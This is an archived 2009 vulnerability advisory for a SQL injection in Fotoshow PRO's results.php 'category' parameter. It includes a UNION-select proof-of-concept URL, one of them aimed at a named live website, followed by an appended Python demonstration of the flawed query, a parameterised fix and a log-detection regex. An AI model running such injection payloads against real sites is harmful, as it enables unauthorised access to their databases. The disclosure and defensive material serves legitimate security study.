
# Title : Fotoshow PRO (category) Remote SQL Injection Vulnerability
# Published : 2009-08-18
# Author : darkmasking


==========================================================================================
 Fotoshow PRO™ (category) Remote SQL Injection Vulnerability
==========================================================================================
 Author         : darkmasking
 Date           : August 15th, 2009
 Contact        : darkmasking[at]gmail[dot]com
 Critical Level : Dangerous (*RED)
------------------------------------------------------------------------------------------
 Affected software description :
 Software : Fotoshow PRO™
 Vendor   : http://www.fotoshowpro.com/
 Price    : $5,000 (USD) http://www.fotoshowpro.com/features.php _o/
==========================================================================================

 [~] SQLi POC

 [+] http://www.target.com/[path]/results.php?category=[SQLi]

------------------------------------------------------------------------------------------

 [~] SQLi POC Demo

 [+] http://www.macduffeverton.com/stock/results.php?category=-9999 and 1=0 union select null,version(),null,null,null--

------------------------------------------------------------------------------------------

 [~] Greetz

	Sorry bro, I haven't found any friends yet, so this one is just for myself! (HAPPY 17th OF AUGUST CELEBRATION | Hope it's festive)

==========================================================================================
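The advisory gives only the injectable parameter (`results.php?category=`) and a five-column UNION payload. The following Python example is added here to show the defensive side of that finding; it is not code from the advisory or from the Fotoshow PRO product. The `photos` table, the `results_vulnerable`/`results_hardened` functions and the access-log line are all constructed for illustration (the real application is PHP and its schema is unknown), and the payload is adapted from the advisory's demo with `sqlite_version()` standing in for MySQL's `version()`, since the example runs on an in-memory SQLite database.

```python
import re
import sqlite3
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Constructed schema standing in for the gallery's results table. Five columns
# so that it lines up with the five-column UNION in the advisory's PoC.
SCHEMA = """
CREATE TABLE photos (id INTEGER, title TEXT, category INTEGER, path TEXT, price REAL);
INSERT INTO photos VALUES (1, 'Sunset',  3, '/img/1.jpg', 9.99);
INSERT INTO photos VALUES (2, 'Harbour', 3, '/img/2.jpg', 12.50);
INSERT INTO photos VALUES (3, 'Forest',  7, '/img/3.jpg', 4.00);
"""

# Advisory payload adapted to SQLite (MySQL's version() -> sqlite_version()).
INJECTED = "-9999 and 1=0 union select null,sqlite_version(),null,null,null--"


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def results_vulnerable(conn, category):
    # Hypothetical reconstruction of the flawed pattern: the request parameter
    # is concatenated straight into the statement, so attacker-controlled text
    # becomes part of the SQL grammar rather than a value.
    sql = "SELECT id, title, category, path, price FROM photos WHERE category=" + category
    return conn.execute(sql).fetchall()


def results_hardened(conn, category):
    # Reject anything that is not a small positive integer before the value gets
    # near the database ...
    if not re.fullmatch(r"\d{1,9}", category):
        raise ValueError("category must be a positive integer")
    # ... and bind it as a parameter, so it can never be parsed as SQL.
    sql = "SELECT id, title, category, path, price FROM photos WHERE category=?"
    return conn.execute(sql, (int(category),)).fetchall()


# Detection side: a loose signature for UNION-based probes against the
# category parameter, for use over web-server access logs.
UNION_PROBE = re.compile(r"union\s+(all\s+)?select\b", re.IGNORECASE)


def flag_request(request_line):
    """Return True when the request's 'category' value looks like a UNION probe."""
    url = request_line.split()[1]          # "GET /path?query HTTP/1.1" -> "/path?query"
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for value in params.get("category", []):
        if UNION_PROBE.search(unquote_plus(value)):
            return True
    return False


# Constructed sample access-log request lines (not real traffic).
SAMPLE_REQUESTS = [
    "GET /stock/results.php?category=3 HTTP/1.1",
    "GET /stock/results.php?category=-9999+and+1%3D0+union+select+null%2Cversion()%2Cnull%2Cnull%2Cnull-- HTTP/1.1",
]

if __name__ == "__main__":
    db = open_db()
    print("vulnerable, injected :", results_vulnerable(db, INJECTED))
    print("hardened,   normal   :", results_hardened(db, "3"))
    try:
        results_hardened(db, INJECTED)
    except ValueError as exc:
        print("hardened,   injected :", exc)
    for line in SAMPLE_REQUESTS:
        print("flagged" if flag_request(line) else "clean  ", line)
```

Run as a script, the vulnerable function returns a single row whose second column is the database version string (the data the advisory's demo URL extracts), while the hardened function refuses the same input before any query is built; the log check flags the encoded probe and leaves the ordinary request alone. The integer check is the cheap first line of defence, but the parameter binding is what actually closes the hole, and it should be applied to every request-derived value in the query, not only the one named in the advisory.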

# www.Syue.com [2009-08-18]